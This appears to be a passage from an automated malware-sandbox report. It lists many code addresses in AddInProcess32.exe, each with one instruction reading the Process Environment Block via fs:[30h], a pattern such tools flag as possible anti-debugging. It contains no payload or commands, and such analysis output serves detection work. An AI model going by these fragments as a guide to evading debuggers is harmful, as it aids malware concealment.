Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185B171 mov eax, dword ptr fs:[00000030h]	17_2_0185B171
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01859080 mov eax, dword ptr fs:[00000030h]	17_2_01859080
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D3884 mov eax, dword ptr fs:[00000030h]	17_2_018D3884
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D3884 mov eax, dword ptr fs:[00000030h]	17_2_018D3884
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018990AF mov eax, dword ptr fs:[00000030h]	17_2_018990AF
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018820A0 mov eax, dword ptr fs:[00000030h]	17_2_018820A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018820A0 mov eax, dword ptr fs:[00000030h]	17_2_018820A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018820A0 mov eax, dword ptr fs:[00000030h]	17_2_018820A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018820A0 mov eax, dword ptr fs:[00000030h]	17_2_018820A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018820A0 mov eax, dword ptr fs:[00000030h]	17_2_018820A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018820A0 mov eax, dword ptr fs:[00000030h]	17_2_018820A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188F0BF mov ecx, dword ptr fs:[00000030h]	17_2_0188F0BF
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188F0BF mov eax, dword ptr fs:[00000030h]	17_2_0188F0BF
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188F0BF mov eax, dword ptr fs:[00000030h]	17_2_0188F0BF
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018EB8D0 mov eax, dword ptr fs:[00000030h]	17_2_018EB8D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018EB8D0 mov ecx, dword ptr fs:[00000030h]	17_2_018EB8D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018EB8D0 mov eax, dword ptr fs:[00000030h]	17_2_018EB8D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018EB8D0 mov eax, dword ptr fs:[00000030h]	17_2_018EB8D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018EB8D0 mov eax, dword ptr fs:[00000030h]	17_2_018EB8D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018EB8D0 mov eax, dword ptr fs:[00000030h]	17_2_018EB8D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018540E1 mov eax, dword ptr fs:[00000030h]	17_2_018540E1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018540E1 mov eax, dword ptr fs:[00000030h]	17_2_018540E1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018540E1 mov eax, dword ptr fs:[00000030h]	17_2_018540E1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018558EC mov eax, dword ptr fs:[00000030h]	17_2_018558EC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01924015 mov eax, dword ptr fs:[00000030h]	17_2_01924015
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01924015 mov eax, dword ptr fs:[00000030h]	17_2_01924015
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D7016 mov eax, dword ptr fs:[00000030h]	17_2_018D7016
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D7016 mov eax, dword ptr fs:[00000030h]	17_2_018D7016
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D7016 mov eax, dword ptr fs:[00000030h]	17_2_018D7016
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188002D mov eax, dword ptr fs:[00000030h]	17_2_0188002D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188002D mov eax, dword ptr fs:[00000030h]	17_2_0188002D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188002D mov eax, dword ptr fs:[00000030h]	17_2_0188002D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188002D mov eax, dword ptr fs:[00000030h]	17_2_0188002D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188002D mov eax, dword ptr fs:[00000030h]	17_2_0188002D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186B02A mov eax, dword ptr fs:[00000030h]	17_2_0186B02A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186B02A mov eax, dword ptr fs:[00000030h]	17_2_0186B02A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186B02A mov eax, dword ptr fs:[00000030h]	17_2_0186B02A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186B02A mov eax, dword ptr fs:[00000030h]	17_2_0186B02A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01870050 mov eax, dword ptr fs:[00000030h]	17_2_01870050
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01870050 mov eax, dword ptr fs:[00000030h]	17_2_01870050
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01912073 mov eax, dword ptr fs:[00000030h]	17_2_01912073
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01921074 mov eax, dword ptr fs:[00000030h]	17_2_01921074
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01861B8F mov eax, dword ptr fs:[00000030h]	17_2_01861B8F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01861B8F mov eax, dword ptr fs:[00000030h]	17_2_01861B8F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0190D380 mov ecx, dword ptr fs:[00000030h]	17_2_0190D380
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188B390 mov eax, dword ptr fs:[00000030h]	17_2_0188B390
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191138A mov eax, dword ptr fs:[00000030h]	17_2_0191138A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01882397 mov eax, dword ptr fs:[00000030h]	17_2_01882397
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01884BAD mov eax, dword ptr fs:[00000030h]	17_2_01884BAD
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01884BAD mov eax, dword ptr fs:[00000030h]	17_2_01884BAD
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01884BAD mov eax, dword ptr fs:[00000030h]	17_2_01884BAD
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01925BA5 mov eax, dword ptr fs:[00000030h]	17_2_01925BA5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D53CA mov eax, dword ptr fs:[00000030h]	17_2_018D53CA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D53CA mov eax, dword ptr fs:[00000030h]	17_2_018D53CA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018803E2 mov eax, dword ptr fs:[00000030h]	17_2_018803E2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018803E2 mov eax, dword ptr fs:[00000030h]	17_2_018803E2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018803E2 mov eax, dword ptr fs:[00000030h]	17_2_018803E2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018803E2 mov eax, dword ptr fs:[00000030h]	17_2_018803E2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018803E2 mov eax, dword ptr fs:[00000030h]	17_2_018803E2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018803E2 mov eax, dword ptr fs:[00000030h]	17_2_018803E2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187DBE9 mov eax, dword ptr fs:[00000030h]	17_2_0187DBE9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191131B mov eax, dword ptr fs:[00000030h]	17_2_0191131B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185DB40 mov eax, dword ptr fs:[00000030h]	17_2_0185DB40
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01928B58 mov eax, dword ptr fs:[00000030h]	17_2_01928B58
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185F358 mov eax, dword ptr fs:[00000030h]	17_2_0185F358
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185DB60 mov ecx, dword ptr fs:[00000030h]	17_2_0185DB60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01883B7A mov eax, dword ptr fs:[00000030h]	17_2_01883B7A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01883B7A mov eax, dword ptr fs:[00000030h]	17_2_01883B7A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188D294 mov eax, dword ptr fs:[00000030h]	17_2_0188D294
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188D294 mov eax, dword ptr fs:[00000030h]	17_2_0188D294
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018552A5 mov eax, dword ptr fs:[00000030h]	17_2_018552A5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018552A5 mov eax, dword ptr fs:[00000030h]	17_2_018552A5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018552A5 mov eax, dword ptr fs:[00000030h]	17_2_018552A5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018552A5 mov eax, dword ptr fs:[00000030h]	17_2_018552A5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018552A5 mov eax, dword ptr fs:[00000030h]	17_2_018552A5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186AAB0 mov eax, dword ptr fs:[00000030h]	17_2_0186AAB0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186AAB0 mov eax, dword ptr fs:[00000030h]	17_2_0186AAB0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188FAB0 mov eax, dword ptr fs:[00000030h]	17_2_0188FAB0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01882ACB mov eax, dword ptr fs:[00000030h]	17_2_01882ACB
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01882AE4 mov eax, dword ptr fs:[00000030h]	17_2_01882AE4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191AA16 mov eax, dword ptr fs:[00000030h]	17_2_0191AA16
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191AA16 mov eax, dword ptr fs:[00000030h]	17_2_0191AA16
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01868A0A mov eax, dword ptr fs:[00000030h]	17_2_01868A0A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185AA16 mov eax, dword ptr fs:[00000030h]	17_2_0185AA16
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185AA16 mov eax, dword ptr fs:[00000030h]	17_2_0185AA16
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01855210 mov eax, dword ptr fs:[00000030h]	17_2_01855210
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01855210 mov ecx, dword ptr fs:[00000030h]	17_2_01855210
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01855210 mov eax, dword ptr fs:[00000030h]	17_2_01855210
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01855210 mov eax, dword ptr fs:[00000030h]	17_2_01855210
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01873A1C mov eax, dword ptr fs:[00000030h]	17_2_01873A1C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01894A2C mov eax, dword ptr fs:[00000030h]	17_2_01894A2C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01894A2C mov eax, dword ptr fs:[00000030h]	17_2_01894A2C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191EA55 mov eax, dword ptr fs:[00000030h]	17_2_0191EA55
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01859240 mov eax, dword ptr fs:[00000030h]	17_2_01859240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01859240 mov eax, dword ptr fs:[00000030h]	17_2_01859240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01859240 mov eax, dword ptr fs:[00000030h]	17_2_01859240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01859240 mov eax, dword ptr fs:[00000030h]	17_2_01859240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018E4257 mov eax, dword ptr fs:[00000030h]	17_2_018E4257
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0190B260 mov eax, dword ptr fs:[00000030h]	17_2_0190B260
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0190B260 mov eax, dword ptr fs:[00000030h]	17_2_0190B260
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01928A62 mov eax, dword ptr fs:[00000030h]	17_2_01928A62
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0189927A mov eax, dword ptr fs:[00000030h]	17_2_0189927A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01882581 mov eax, dword ptr fs:[00000030h]	17_2_01882581
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01882581 mov eax, dword ptr fs:[00000030h]	17_2_01882581
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01882581 mov eax, dword ptr fs:[00000030h]	17_2_01882581
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01882581 mov eax, dword ptr fs:[00000030h]	17_2_01882581
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01852D8A mov eax, dword ptr fs:[00000030h]	17_2_01852D8A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01852D8A mov eax, dword ptr fs:[00000030h]	17_2_01852D8A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01852D8A mov eax, dword ptr fs:[00000030h]	17_2_01852D8A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01852D8A mov eax, dword ptr fs:[00000030h]	17_2_01852D8A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01852D8A mov eax, dword ptr fs:[00000030h]	17_2_01852D8A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188FD9B mov eax, dword ptr fs:[00000030h]	17_2_0188FD9B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188FD9B mov eax, dword ptr fs:[00000030h]	17_2_0188FD9B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018835A1 mov eax, dword ptr fs:[00000030h]	17_2_018835A1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01881DB5 mov eax, dword ptr fs:[00000030h]	17_2_01881DB5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01881DB5 mov eax, dword ptr fs:[00000030h]	17_2_01881DB5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01881DB5 mov eax, dword ptr fs:[00000030h]	17_2_01881DB5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019205AC mov eax, dword ptr fs:[00000030h]	17_2_019205AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019205AC mov eax, dword ptr fs:[00000030h]	17_2_019205AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6DC9 mov eax, dword ptr fs:[00000030h]	17_2_018D6DC9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6DC9 mov eax, dword ptr fs:[00000030h]	17_2_018D6DC9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6DC9 mov eax, dword ptr fs:[00000030h]	17_2_018D6DC9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6DC9 mov ecx, dword ptr fs:[00000030h]	17_2_018D6DC9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6DC9 mov eax, dword ptr fs:[00000030h]	17_2_018D6DC9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6DC9 mov eax, dword ptr fs:[00000030h]	17_2_018D6DC9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01908DF1 mov eax, dword ptr fs:[00000030h]	17_2_01908DF1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186D5E0 mov eax, dword ptr fs:[00000030h]	17_2_0186D5E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186D5E0 mov eax, dword ptr fs:[00000030h]	17_2_0186D5E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191FDE2 mov eax, dword ptr fs:[00000030h]	17_2_0191FDE2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191FDE2 mov eax, dword ptr fs:[00000030h]	17_2_0191FDE2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191FDE2 mov eax, dword ptr fs:[00000030h]	17_2_0191FDE2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191FDE2 mov eax, dword ptr fs:[00000030h]	17_2_0191FDE2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01928D34 mov eax, dword ptr fs:[00000030h]	17_2_01928D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0191E539 mov eax, dword ptr fs:[00000030h]	17_2_0191E539
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01863D34 mov eax, dword ptr fs:[00000030h]	17_2_01863D34
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01884D3B mov eax, dword ptr fs:[00000030h]	17_2_01884D3B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01884D3B mov eax, dword ptr fs:[00000030h]	17_2_01884D3B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01884D3B mov eax, dword ptr fs:[00000030h]	17_2_01884D3B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185AD30 mov eax, dword ptr fs:[00000030h]	17_2_0185AD30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018DA537 mov eax, dword ptr fs:[00000030h]	17_2_018DA537
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01893D43 mov eax, dword ptr fs:[00000030h]	17_2_01893D43
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D3540 mov eax, dword ptr fs:[00000030h]	17_2_018D3540
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01903D40 mov eax, dword ptr fs:[00000030h]	17_2_01903D40
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01877D50 mov eax, dword ptr fs:[00000030h]	17_2_01877D50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187C577 mov eax, dword ptr fs:[00000030h]	17_2_0187C577
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187C577 mov eax, dword ptr fs:[00000030h]	17_2_0187C577
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0186849B mov eax, dword ptr fs:[00000030h]	17_2_0186849B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01928CD6 mov eax, dword ptr fs:[00000030h]	17_2_01928CD6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019114FB mov eax, dword ptr fs:[00000030h]	17_2_019114FB
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6CF0 mov eax, dword ptr fs:[00000030h]	17_2_018D6CF0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6CF0 mov eax, dword ptr fs:[00000030h]	17_2_018D6CF0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6CF0 mov eax, dword ptr fs:[00000030h]	17_2_018D6CF0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6C0A mov eax, dword ptr fs:[00000030h]	17_2_018D6C0A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6C0A mov eax, dword ptr fs:[00000030h]	17_2_018D6C0A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6C0A mov eax, dword ptr fs:[00000030h]	17_2_018D6C0A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D6C0A mov eax, dword ptr fs:[00000030h]	17_2_018D6C0A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01911C06 mov eax, dword ptr fs:[00000030h]	17_2_01911C06
